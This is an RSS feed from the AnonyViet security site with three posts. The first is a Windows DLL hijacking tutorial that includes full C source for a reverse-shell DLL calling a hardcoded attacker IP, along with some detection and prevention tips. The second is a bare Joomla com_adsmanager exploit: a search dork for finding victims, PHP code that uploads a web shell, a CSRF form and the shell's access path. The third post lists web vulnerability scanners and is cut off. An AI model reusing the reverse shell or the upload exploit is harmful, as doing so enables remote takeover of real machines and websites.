<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>exploit &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/exploit/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Fri, 07 Mar 2025 22:51:16 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>exploit &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to exploit the holy hole of Hijacking on Windows</title>
		<link>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/</link>
					<comments>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 07 Mar 2025 22:51:16 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Hijacking]]></category>
		<category><![CDATA[hole]]></category>
		<category><![CDATA[holy]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=18438</guid>

					<description><![CDATA[Dll hijacking &#8211; The name sounds somewhat mysterious, but it is an interesting attack technique that anyone who cares about security wants to explore. On the Windows operating system, the programs depend a lot on the DLL file (Dynamic Link Library) to operate smoothly. But if a cunning hacker replaces the original DLL with a [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>Dll hijacking</strong> &#8211; The name sounds somewhat mysterious, but it is an interesting attack technique that anyone who cares about security wants to explore. On the Windows operating system, the programs depend a lot on the DLL file (Dynamic Link Library) to operate smoothly. But if a cunning hacker replaces the original DLL with a &#8220;toxic&#8221; version, what will happen?</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">&#13;</p>
<tbody>&#13;</p>
<tr>&#13;</p>
<td style="width: 100%; text-align: center;">&#13;<br />
                        <span style="font-size: 12pt;">&#13;<br />
                            <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong>&#13;<br />
                        </span>&#13;
                    </td>
<p>&#13;<br />
                </tr>
<p>&#13;<br />
            </tbody>
<p>&#13;<br />
        </table>
</p></div>
<p><strong>Important note:</strong> This article only serves the purpose of learning and research. Anonyviet does not encourage any illegal behavior, and you need to be responsible for your actions!</p>
<h2 id="ftoc-dll-hijacking-la-gi" class="ftwp-heading"><strong>What is Dll Hijacking?</strong></h2>
<p>DLL Hijacking is a gap technique when the program does not strictly control the DLL file. When an application like DISM.EXE (Windows system management tool) runs, it will search for the DLL needed in a series of folders in the order of priority.</p>
<p>If the hacker puts a fake DLL in the directory that the program checks before coming to the Orthodox folder (such as System32), the application will &#8220;innocent&#8221; download malware instead of the original DLL. This is the &#8220;gap&#8221; that security experts &#8211; or hackers &#8211; can take advantage.</p>
<figure id="attachment_82303" aria-describedby="caption-attachment-82303" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82303 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1.jpg" alt="What is Dll Hijacking?" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 12" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82303" class="wp-caption-text">What is Dll Hijacking?</figcaption></figure>
<h2 id="ftoc-tai-sao-dism-exe-la-muc-tieu-ly-tuong" class="ftwp-heading"><strong>Why is dism.exe an ideal goal?</strong></h2>
<p>DISM.EXE is a built -in tool in Windows, usually located in C: \ Windows \ System32. Because of its popularity and role in managing the system, DISM.EXE became an attractive &#8220;prey&#8221; to test the DLL Hijacking. Moreover, the way Windows search DLL is sometimes lacking, opening up opportunities for sophisticated attacks.</p>
<h2 id="ftoc-huong-dan-khai-thac-dll-hijacking-voi-process-monitor" class="ftwp-heading"><strong>Guide to exploit dll hijacking with process monitor</strong></h2>
<p>To exploit this gap, we need a process monitor tool from Sysinternals. This is a &#8220;powerful assistant&#8221; to help you track how the system interacts with DLL files. Here are the detailed steps:</p>
<h3 id="ftoc-buoc-1-chuan-bi-moi-truong-thu-nghiem" class="ftwp-heading"><strong>Step 1: Prepare the testing environment</strong></h3>
<figure id="attachment_82304" aria-describedby="caption-attachment-82304" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82304 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2.jpg" alt="Download Process Monitor" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 13" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82304" class="wp-caption-text">Download Process Monitor</figcaption></figure>
<ul>
<li>To be safe, use VirtualBox or <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcach-tai-vmware-workstation-pro-va-fusion-pro%2F" class="local-link">Vmware</a> Instead of trying directly on the main machine.</li>
<li>Select the goal: Here, I choose Dism.exe, but you can apply this method to any program.</li>
</ul>
<h3 id="ftoc-buoc-2-theo-doi-hanh-vi-cua-dism-exe" class="ftwp-heading"><strong>Step 2: Monitor the behavior of dism.exe</strong></h3>
<p>Open Process Monitor, you will see a series of system events recorded. Don&#39;t panic! Set the filter to focus:</p>
<ul>
<li>Press <strong>Ctrl + L</strong> (or go to Filter> Filter).</li>
<li>Add conditions: <strong>Process Name &#8211; IS &#8211; DISM.EXE &#8211; Include</strong> and <strong>Path &#8211; Contains</strong><br /><strong>&#8211; .dll &#8211; Include</strong></li>
</ul>
<figure id="attachment_82305" aria-describedby="caption-attachment-82305" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82305 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3.jpg" alt="Add conditions" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 14" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82305" class="wp-caption-text">Add conditions</figcaption></figure>
<ul>
<li>Press <strong>Add</strong> Already <strong>OK</strong>. Now Process Monitor only shows activities related to DISM.EXE and DLL.</li>
</ul>
<h3 id="ftoc-buoc-3-chay-dism-exe-va-quan-sat" class="ftwp-heading"><strong>Step 3: Run Dism.exe and observe</strong></h3>
<ul>
<li>Open PowerShell, type<strong> C: \ Windows \ System32 \ DISM.EXE</strong> and click Enter.</li>
<li>Back to Process Monitor, you will see the list of DLLs that Dism.exe try to download.</li>
</ul>
<figure id="attachment_82306" aria-describedby="caption-attachment-82306" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82306 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4.jpg" alt="List of DLLs that DISM.EXE tries to download" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 15" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82306" class="wp-caption-text">List of DLLs that DISM.EXE tries to download</figcaption></figure>
<ul>
<li>If the result column displays &#8220;<strong>Name not found</strong>It is a sign that the program can be exploited DLL Hijacking.</li>
</ul>
<p>For example, I discovered the file <strong>C: \ Windows \ System32 \ Dismcore.dll</strong> Can be exploited.</p>
<figure id="attachment_82307" aria-describedby="caption-attachment-82307" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82307 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5.jpg" alt="Program signs can be exploited DLL Hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 16" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82307" class="wp-caption-text">Program signs can be exploited DLL Hijacking</figcaption></figure>
<h3 id="ftoc-buoc-4-tao-dll-gia-mao" class="ftwp-heading"><strong>Step 4: Create fake DLL</strong></h3>
<ul>
<li>Copy dism.exe to the %Temp %folder.</li>
</ul>
<figure id="attachment_82308" aria-describedby="caption-attachment-82308" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82308 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6.jpg" alt="Copy dism.exe into the %temp %folder" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 17" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82308" class="wp-caption-text">Copy dism.exe into the %temp %folder</figcaption></figure>
<ul>
<li>Create a toxic dismcore.dll file. Here I created a Payload Reverse Shell called DISMCORE.CPP and translated into Dismcore.dll file with Visual Studio then copied it to the % Temp % directory and ran the dism.exe file again</li>
</ul>
<p><code>#define REVERSEIP "193.161.193.99" #địa chỉ ip máy hacker</code><br /><code>#define REVERSEPORT 52543 #port máy hacker</code></p>
<p><code>#include <winsock2.h/></code><br /><code>#include <stdio.h/></code></p>
<p><code>#pragma comment(lib,"ws2_32")</code></p>
<p><code>WSADATA wsaData;</code><br /><code>SOCKET Winsock; </code><br /><code>SOCKET Sock; </code><br /><code>struct sockaddr_in hax;</code></p>
<p><code>STARTUPINFO ini_processo;</code><br /><code>PROCESS_INFORMATION processo_info;</code></p>
<p><code>BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)</code><br /><code>{ </code><br /><code>WSAStartup(MAKEWORD(2,2), &amp;wsaData);</code><br /><code>Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);</code></p>
<p><code>hax.sin_family = AF_INET; </code><br /><code>hax.sin_port = htons(REVERSEPORT);</code><br /><code>hax.sin_addr.s_addr = inet_addr(REVERSEIP);</code></p>
<p><code>WSAConnect(Winsock,(SOCKADDR*)&amp;hax,sizeof(hax),NULL,NULL,NULL,NULL);</code></p>
<p><code>memset(&amp;ini_processo,0,sizeof(ini_processo));</code><br /><code>ini_processo.cb=sizeof(ini_processo); </code><br /><code>ini_processo.dwFlags=STARTF_USESTDHANDLES; </code><br /><code>ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;</code></p>
<p><code>CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&amp;ini_processo,&amp;processo_info); </code><br /><code>return TRUE;</code><br /><code>}</code></p>
<figure id="attachment_82309" aria-describedby="caption-attachment-82309" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82309 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7.jpg" alt="Create a toxic dismcore.dll file" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 18" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82309" class="wp-caption-text">Create a toxic dismcore.dll file</figcaption></figure>
<h3 id="ftoc-buoc-5-kiem-tra-ket-qua" class="ftwp-heading"><strong>Step 5: Check the results</strong></h3>
<p>Run Dism.exe from %Temp %. If successful, a Reverse Shell connection will be sent to IP and port you have defined. Hackers can now control the machine remote!</p>
<h2 id="ftoc-cach-phat-hien-va-phong-chong-dll-hijacking" class="ftwp-heading"><strong>How to detect and prevent dll hijacking</strong></h2>
<p>Understanding how to exploit is one thing, but protecting the system from DLL Hijacking is another challenge. Here&#39;s how to identify and prevent:</p>
<h3 id="ftoc-cach-phat-hien-dll-hijacking" class="ftwp-heading"><strong>How to detect dll hijacking</strong></h3>
<h4 id="ftoc-1-kham-pha-bang-process-monitor" class="ftwp-heading"><strong>1. Explore by Process Monitor</strong></h4>
<p>This is an effective tool to track the DLL download program: Observe the application&#39;s operation and search for the &#8220;name not found&#8221; line in the result column, when it tries to take DLL from non -security positions (such as the directory is in use or outside the System32).</p>
<p>If the DLL search application in places is susceptible to the bad guy who inserts a fake file before going to the standard folder, which is a potential sign.</p>
<figure id="attachment_82310" aria-describedby="caption-attachment-82310" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82310 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8.jpg" alt="How to detect dll hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 19" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82310" class="wp-caption-text">How to detect dll hijacking</figcaption></figure>
<h4 id="ftoc-2-tan-dung-dllspy" class="ftwp-heading"><strong>2. Take advantage of DLLSPY</strong></h4>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fcyberark%2FDLLSpy" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Dllspy</a> Is a compact, specialized solution to detect the risk of dll hijacking:</p>
<p><strong>How to do it:</strong></p>
<ol>
<li>Start DLLSPY on the computer.</li>
<li>The tool will review the running processes, checking how they search DLL.</li>
<li>DLLSPY offers a list of applications that may be attacked if they prioritize DLL from unreliable folders (such as personal directory or abnormal paths).</li>
</ol>
<p><strong>Strengths:</strong> DLLSPY automates the analysis, helping to quickly indicate vulnerable software without manual manipulation as with Process Monitor.</p>
<p>For example, when checking DISM.EXE, DLLSPY may detect whether it looks for dismcore.dll outside the system32.</p>
<h4 id="ftoc-3-kiem-tra-trinh-tu-tai-dll-qua-dependency-walker" class="ftwp-heading"><strong>3. Check the DLL download sequence via Dependency Walker</strong></h4>
<p>Download <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.dependencywalker.com%2F" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Dependency Walker</a> (Free) To consider the DLL that the software needs to use.<br />Run the application in this tool, then observe the DLL list and the loading path. If DLL is found to be taken from an unofficial place, it is a warning signal.</p>
<h4 id="ftoc-4-luu-y-dau-hieu-bat-thuong" class="ftwp-heading"><strong>4.</strong></h4>
<ul>
<li>When a familiar software (such as dism.exe) works strange (displaying strange messages or having errors), it is likely that DLL has been replaced.</li>
<li>Use Task Manager or Process Explorer to check the related processes and verify the file origin.</li>
</ul>
<h3 id="ftoc-nhung-bien-phap-ngan-ngua-lo-hong-dll-hijacking" class="ftwp-heading"><strong>Measures to prevent DLL hole Hijacking</strong></h3>
<h4 id="ftoc-1-gioi-han-quyen-truy-cap-thu-muc" class="ftwp-heading"><strong>1. Limit access to folders</strong></h4>
<ul>
<li>Make sure that only administrators are allowed to record data in important folders such as C: \ Windows \ System32.</li>
<li>Avoid launching applications from unsafe places (for example: C: \ Downloads), because the attacker can place fake DLL there.</li>
</ul>
<figure id="attachment_82311" aria-describedby="caption-attachment-82311" style="width: 600px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-82311 size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9.jpg" alt="Measures to prevent DLL hole Hijacking" width="600" height="400" title="How to exploit the holy hole of Hijacking on Windows 20" srcset="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9.jpg 600w, https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9-300x200.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px"/><figcaption id="caption-attachment-82311" class="wp-caption-text">Measures to prevent DLL hole Hijacking</figcaption></figure>
<h4 id="ftoc-2-ap-dung-duong-dan-co-dinh-trong-lap-trinh" class="ftwp-heading"><strong>2. Apply fixed path in programming</strong></h4>
<p>If you develop the software, configure the program to call DLL with a clear link (like C: \ Windows \ System32 \ Dismcore.dll), instead of letting it freely search.</p>
<h4 id="ftoc-3-bat-che-do-safedllsearchmode" class="ftwp-heading"><strong>3. Turn on Safedllsearchmode mode</strong></h4>
<p>Check and set the SafedllsearchMode value in the Registry (at <strong>Hkey_local_machine \ System \ CurrentControlset \ Control \ Session Manager</strong>) into 1, to prioritize the first system folders.</p>
<h4 id="ftoc-4-trien-khai-cong-cu-bao-ve" class="ftwp-heading"><strong>4. Deploying protection tools</strong></h4>
<p>Use anti -virus or anti -malicious software (such as MalwareStes, Kaspersky, &#8230;) to identify and prevent dangerous DLLs promptly.</p>
<h2 id="ftoc-ket-luan" class="ftwp-heading"><strong>Conclude</strong></h2>
<p><strong>Dll hijacking</strong> Not only is an attack technique but also a warning about the importance of software security. With tools like Process Monitor, you can both exploit and prevent this hole effectively. The world of security is still countless interesting things waiting for you to explore. Start today, turn your knowledge into strength and always be careful in every step!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-exploit-the-holy-hole-of-hijacking-on-windows/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Joomla com_adsmanager Exploit &#8211; AnonyViet</title>
		<link>https://en.anonyviet.com/joomla-com_adsmanager-exploit-anonyviet/</link>
					<comments>https://en.anonyviet.com/joomla-com_adsmanager-exploit-anonyviet/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 21:50:41 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[AnonyViet]]></category>
		<category><![CDATA[com_adsmanager]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Joomla]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=8098</guid>

					<description><![CDATA[Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org Join the channel Telegram of the AnonyViet 👉 Link 👈 PHP CODE: &#60;?php&#13; &#13; $url = "site.com/index.php?option=com_adsmanager&#38;task=upload&#38;tmpl=component"; // put URL Here&#13; $post = array&#13; (&#13; "file" =&#62; "@shell.jpg",&#13; "name" =&#62; "shell.php"&#13; );&#13; $ch = curl_init ("$url");&#13; curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);&#13; curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);&#13; curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>PHP CODE:</p>
<pre class="lang:php decode:true ">&lt;?php&#13;
&#13;
$url = "site.com/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component"; // put URL Here&#13;
$post = array&#13;
(&#13;
"file" =&gt; "@shell.jpg",&#13;
"name" =&gt; "shell.php"&#13;
);&#13;
$ch = curl_init ("$url");&#13;
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);&#13;
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);&#13;
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");&#13;
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);&#13;
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);&#13;
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);&#13;
curl_setopt ($ch, CURLOPT_POST, 1);&#13;
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);&#13;
$data = curl_exec ($ch);&#13;
curl_close ($ch);&#13;
echo $data;&#13;
&#13;
?&gt;</pre>
<p>#CSRF :</p>
<pre class="lang:php decode:true ">&lt;form method="POST" action="TARGET/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component"&#13;
enctype="multipart/form-data"&gt;&#13;
&lt;input type="file" name="files[]" /&gt;&lt;button&gt;Upload&lt;/button&gt;&#13;
&lt;/form&gt;</pre>
</p>
<p>Access Shell: site.com/tmp/plupload/shell.php</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;382&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/joomla-com_adsmanager-exploit-anonyviet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/joomla-com_joomleague-execute-arbitrary-PHP-code-Exploit.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>14 Web Vulnerability Scan Tools to Exploit</title>
		<link>https://en.anonyviet.com/14-web-vulnerability-scan-tools-to-exploit/</link>
					<comments>https://en.anonyviet.com/14-web-vulnerability-scan-tools-to-exploit/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 07:16:15 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Scan]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[web]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7241</guid>

					<description><![CDATA[In the past, many famous websites have been hacked by hackers and caused serious consequences, causing loss of reputation for businesses. The security check for the website is extremely important to avoid future losses. The security assessment for the website needs skilled experts with great cost, in addition, it is necessary to coordinate the use [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>In the past, many famous websites have been hacked by hackers and caused serious consequences, causing loss of reputation for businesses.  The security check for the website is extremely important to avoid future losses.  The security assessment for the website needs skilled experts with great cost, in addition, it is necessary to coordinate the use of Application Security Scanner tools to quickly find and provide timely patches to ensure the security of the websites. website.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Application Security Scanner is a software program that allows you to check for security Vulnerabilities on websites.</p>
<p>Application Security Scanner with commercial versions is quite effective like Acunetix web, besides there are many open source webscan programs that bring high efficiency to help experts or programmers quickly and save time. Find security errors on the website system.</p>
<p>You should not confuse open source programs with free programs, they are completely different.  Open source is having a repository of source code for that application so that users can customize it in many different ways, sometimes it is developed into an application that sells for money, sometimes it is shared for free, but all must publish the code. source and free applications are of course free, but its source code is unknown.</p>
<p>first. <b>Grabber</b>:<br />As a WEB APPLICATION vulnerability scanner the vulnerabilities it can detect:<br /><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F04%2F1-1.png" rel="attachment wp-att-1888 noopener" class="local-link"><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-1888" src="https://anonyviet.com/wp-content/uploads/2016/04/1-1.png" alt="first" width="764" height="670" srcset="https://anonyviet.com/wp-content/uploads/2016/04/1-1.png 764w, https://anonyviet.com/wp-content/uploads/2016/04/1-1-300x263.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/1-1-750x658.png 750w" sizes="(max-width: 764px) 100vw, 764px" title="14 Web Vulnerability Scan Tools to Exploit 13"/></a>Cross site scripting<br />SQL injectionAjax testing<br />File inclusion<br />JS source code analyzer<br />Backup file check<br />This tool is considered to run quite quickly with small websites and takes a long time with large websites.<br />This tool is developed in python language and provides no user interface.  You can customize or study its source code.</p>
<p>Download it here: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Frgaucher.info%2Fbeta%2Fgrabber%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://rgaucher.info/beta/grabber/</a><br />Source code on Github: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fneuroo%2Fgrabber" rel="nofollow noopener external" onclick="this.target='_blank';">https://github.com/neuroo/grabber</a></p>
<p>2. <b>Vega</b>:</p>
<p><img post-id="7241" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter size-full wp-image-1889" src="https://anonyviet.com/wp-content/uploads/2016/04/2-1.jpg" alt="14 Web Vulnerability Scan Tools to Exploit" title="14 Web Vulnerability Scan Tools to Exploit" width="800" height="710" srcset="https://anonyviet.com/wp-content/uploads/2016/04/2-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2016/04/2-1-300x266.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/2-1-768x682.png 768w, https://anonyviet.com/wp-content/uploads/2016/04/2-1-696x618.png 696w, https://anonyviet.com/wp-content/uploads/2016/04/2-1-473x420.png 473w" sizes="auto, (max-width: 800px) 100vw, 800px" title="14 Web Vulnerability Scan Tools to Exploit 14"/><br />This is a development tool based on java programming language that can run on OSX, Window, Linux platforms.<br />The Vega tool can look for SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion, and several other web application vulnerabilities.<br />You can set the number of dark scan threads per second when starting to check a website.</p>
